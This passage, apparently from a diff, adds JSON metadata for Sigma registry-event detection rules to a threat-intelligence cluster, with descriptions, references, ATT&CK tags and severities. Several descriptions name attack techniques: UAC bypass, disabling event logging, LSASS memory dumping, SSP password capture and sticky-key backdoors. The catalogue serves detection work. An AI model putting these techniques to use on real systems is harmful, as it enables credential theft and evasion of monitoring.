"critical", + "falsepositive": "No established falsepositives", + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "uuid": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", + "value": "OceanLotus Registry Activity", + "meta": { + "refs": [ + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://github.com/eset/malware-ioc/tree/master/oceanlotus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2019/04/14", + "filename": "registry_event_apt_oceanlotus_registry.yml", + "author": "megan201296, Jonhnathan Ribeiro", + "level": 
"critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects Pandemic Windows Implant", + "uuid": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "value": "Pandemic Registry Key", + "meta": { + "refs": [ + "https://wikileaks.org/vault7/#Pandemic", + "https://twitter.com/MalwareJake/status/870349480356454401", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1105" + ], + "creation_date": "2017/06/01", + "filename": "registry_event_apt_pandemic.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", + "uuid": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "value": "UAC Bypass Via Wsreset", + "meta": { + "refs": [ + "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly", + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2020/10/07", + "filename": "registry_event_bypass_via_wsreset.yml", + "author": "oscd.community, Dmitry Uchakin", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "uuid": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "value": 
"CMSTP Execution Registry Event", + "meta": { + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" + ], + "creation_date": "2018/07/16", + "filename": "registry_event_cmstp_execution_by_registry.yml", + "author": "Nik Seetharaman", + "level": "high", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", + "uuid": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", + "value": "Disable Security Events Logging Adding Reg Key MiniNt", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1182516740955226112", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" + ], + "creation_date": "2019/10/25", + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml", + "author": "Ilyas Ochkov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching 
credentials.\n", + "uuid": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "value": "Wdigest CredGuard Registry Modification", + "meta": { + "refs": [ + "https://teamhydra.blog/2020/08/25/bypassing-credential-guard/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2019/08/25", + "filename": "registry_event_disable_wdigest_credential_guard.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "uuid": "5aad0995-46ab-41bd-a9ff-724f41114971", + "value": "Esentutl Volume Shadow Copy Service Keys", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2020/10/20", + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Windows Credential Editor (WCE)", + "uuid": "a6b33c02-8305-488f-8585-03cb2a7763f2", + "value": "Windows Credential Editor Registry", + "meta": { + "refs": 
[ + "https://www.ampliasecurity.com/research/windows-credentials-editor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" + ], + "creation_date": "2019/12/31", + "filename": "registry_event_hack_wce_reg.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", + "uuid": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "value": "HybridConnectionManager Service Installation - Registry", + "meta": { + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1608" + ], + "creation_date": "2021/04/12", + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the presence of a registry key created during Azorult execution", + "uuid": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "value": "Registry Entries For Azorult Malware", + "meta": { + "refs": [ + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_azorult.yml" + ], + "tags": [ + "attack.execution", + "attack.t1112" + ], + "creation_date": "2020/05/08", + "filename": 
"registry_event_mal_azorult.yml", + "author": "Trent Liffick", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects FlowCloud malware from threat group TA410.", + "uuid": "5118765f-6657-4ddb-a487-d7bd673abbf1", + "value": "FlowCloud Malware", + "meta": { + "refs": [ + "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_flowcloud.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1112" + ], + "creation_date": "2020/06/09", + "filename": "registry_event_mal_flowcloud.yml", + "author": "NVISO", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "uuid": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", + "value": "PrinterNightmare Mimimkatz Driver Name", + "meta": { + "refs": [ + "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760", + "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" + ], + "creation_date": "2021/07/04", + "filename": "registry_event_mimikatz_printernightmare.yml", + "author": "Markus Neis, @markus_neis, Florian Roth", + "level": "critical", + "falsepositive": [ + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer 
(unlikely)" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects value modification of registry key containing path to binary used as screensaver.", + "uuid": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", + "value": "Path To Screensaver Binary Modified", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.002" + ], + "creation_date": "2020/10/11", + "filename": "registry_event_modify_screensaver_binary_path.yml", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate modification of screensaver" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "uuid": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "value": "Narrator's Feedback-Hub Persistence", + "meta": { + "refs": [ + "https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_event_narrator_feedback_persistance.yml", + "author": "Dmitriy Lifanov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects NetNTLM downgrade attack", + "uuid": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + 
"value": "NetNTLM Downgrade Attack - Registry", + "meta": { + "refs": [ + "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" + ], + "creation_date": "2018/03/20", + "filename": "registry_event_net_ntlm_downgrade.yml", + "author": "Florian Roth, wagga", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", + "uuid": "6aa1d992-5925-4e9f-a49b-845e51d1de01", + "value": "New DLL Added to AppCertDlls Registry Key", + "meta": { + "refs": [ + "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", + "https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.009" + ], + "creation_date": "2019/10/25", + "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml", + "author": "Ilyas Ochkov, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", + "uuid": 
"4f84b697-c9ed-4420-8ab5-e09af5b2345d", + "value": "New DLL Added to AppInit_DLLs Registry Key", + "meta": { + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.010" + ], + "creation_date": "2019/10/25", + "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml", + "author": "Ilyas Ochkov, oscd.community, Tim Shelton", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", + "uuid": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "value": "Office Application Startup - Office Test", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1137/002/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_test_regadd.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.002" + ], + "creation_date": "2020/10/25", + "filename": "registry_event_office_test_regadd.yml", + "author": "omkar72", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects persistence registry keys for Recycle Bin", + "uuid": "277efb8f-60be-4f10-b4d3-037802f37167", + "value": "Registry Persistence Mechanisms in Recycle Bin", + "meta": { + "refs": [ + "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", + 
"https://persistence-info.github.io/Data/recyclebin.html", + "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ], + "creation_date": "2021/11/18", + "filename": "registry_event_persistence_recycle_bin.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", + "uuid": "a54f842a-3713-4b45-8c84-5f136fdebd3c", + "value": "PortProxy Registry Key", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://adepts.of0x.cc/netsh-portproxy-code/", + "https://www.dfirnotes.net/portproxy_detection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" + ], + "creation_date": "2021/06/22", + "filename": "registry_event_portproxy_registry_key.yml", + "author": "Andreas Hunkeler (@Karneades)", + "level": "medium", + "falsepositive": [ + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. 
https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", + "Synergy Software KVM (https://symless.com/synergy)" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "uuid": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "value": "RedMimicry Winnti Playbook Registry Manipulation", + "meta": { + "refs": [ + "https://redmimicry.com", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/06/24", + "filename": "registry_event_redmimicry_winnti_reg.yml", + "author": "Alexander Rausch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "uuid": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "value": "WINEKEY Registry Modification", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runkey_winekey.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ], + "creation_date": "2020/10/30", + "filename": "registry_event_runkey_winekey.yml", + "author": "omkar72", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Rule to detect the configuration of Run Once registry key. 
Configured payload can be run by runonce.exe /AlternateShellStartup", + "uuid": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", + "value": "Run Once Task Configuration in Registry", + "meta": { + "refs": [ + "https://twitter.com/pabraeken/status/990717080805789697", + "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/11/15", + "filename": "registry_event_runonce_persistence.yml", + "author": "Avneet Singh @v3t0_, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate modification of the registry key by legitimate program" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. 
UACMe 33 or 62)", + "uuid": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "value": "Shell Open Registry Keys Manipulation", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", + "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", + "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1546.001" + ], + "creation_date": "2021/08/30", + "filename": "registry_event_shell_open_keys_manipulation.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "uuid": "55e29995-75e7-451a-bef0-6225e2f13597", + "value": "SilentProcessExit Monitor Registration for LSASS", + "meta": { + "refs": [ + "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.007" + ], + "creation_date": "2021/02/26", + "filename": "registry_event_silentprocessexit_lsass.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the addition of a SSP to the 
registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "uuid": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "value": "Security Support Provider (SSP) Added to LSA Configuration", + "meta": { + "refs": [ + "https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.005" + ], + "creation_date": "2019/01/18", + "filename": "registry_event_ssp_added_lsa_config.yml", + "author": "iwillkeepwatch", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "uuid": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "value": "Sticky Key Like Backdoor Usage - Registry", + "meta": { + "refs": [ + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" + ], + "creation_date": "2018/03/15", + "filename": "registry_event_stickykey_like_backdoor.yml", + "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation/modification of Assistive Technology applications and 
persistence with usage of 'at'", + "uuid": "9577edbb-851f-4243-8c91-1d5b50c1a39b", + "value": "Atbroker Registry Change", + "meta": { + "refs": [ + "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", + "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.persistence", + "attack.t1547" + ], + "creation_date": "2020/10/13", + "filename": "registry_event_susp_atbroker_change.yml", + "author": "Mateusz Wydra, oscd.community", + "level": "medium", + "falsepositive": [ + "Creation of non-default, legitimate at usage" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "uuid": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "value": "Suspicious Run Key from Download", + "meta": { + "refs": [ + "https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/01", + "filename": "registry_event_susp_download_run_key.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Software installers downloaded and used by users" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "uuid": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "value": "DLL Load via LSASS", + "meta": { + "refs": [ + "https://blog.xpnsec.com/exploring-mimikatz-part-1/", + 
"https://twitter.com/SBousseaden/status/1183745981189427200", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1547.008" + ], + "creation_date": "2019/10/16", + "filename": "registry_event_susp_lsass_dll_load.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "uuid": "62120148-6b7a-42be-8b91-271c04e281a3", + "value": "Suspicious Camera and Microphone Access", + "meta": { + "refs": [ + "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml" + ], + "tags": [ + "attack.collection", + "attack.t1125", + "attack.t1123" + ], + "creation_date": "2020/06/07", + "filename": "registry_event_susp_mic_cam_access.yml", + "author": "Den Iuzvyk", + "level": "high", + "falsepositive": [ + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Alerts on trust record modification within the registry, indicating usage of macros", + "uuid": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "value": "Windows Registry Trust Record Modification", + "meta": { + "refs": [ + "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/", + "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_trust_record_modification.yml" + ], + "tags": [ + 
"attack.initial_access", + "attack.t1566.001" + ], + "creation_date": "2020/02/19", + "filename": "registry_event_trust_record_modification.yml", + "author": "Antonlovesdnb", + "level": "medium", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "uuid": "4e8d5fd3-c959-441f-a941-f73d0cdcdca5", + "value": "Abusing Windows Telemetry For Persistence - Registry", + "meta": { + "refs": [ + "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_abusing_windows_telemetry_for_persistence.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112", + "attack.t1053" + ], + "creation_date": "2020/09/29", + "filename": "registry_set_abusing_windows_telemetry_for_persistence.yml", + "author": "Sreeman", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect modification for a specific user to prevent that user from being listed on the logon screen", + "uuid": "8a58209c-7ae6-4027-afb0-307a78e4589a", + "value": "User Account Hidden By Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_hidden_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.002" + ], + "creation_date": "2022/08/20", + "filename": "registry_set_add_hidden_user.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", + "uuid": "1547e27c-3974-43e2-a7d7-7f484fb928ec", + "value": "Registry Persitence via Service in Safe Mode", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ], + "creation_date": "2022/04/04", + "filename": "registry_set_add_load_service_in_safe_mode.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", + "uuid": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", + "value": "Add Port Monitor Persistence in Registry", + "meta": { + "refs": [ + 
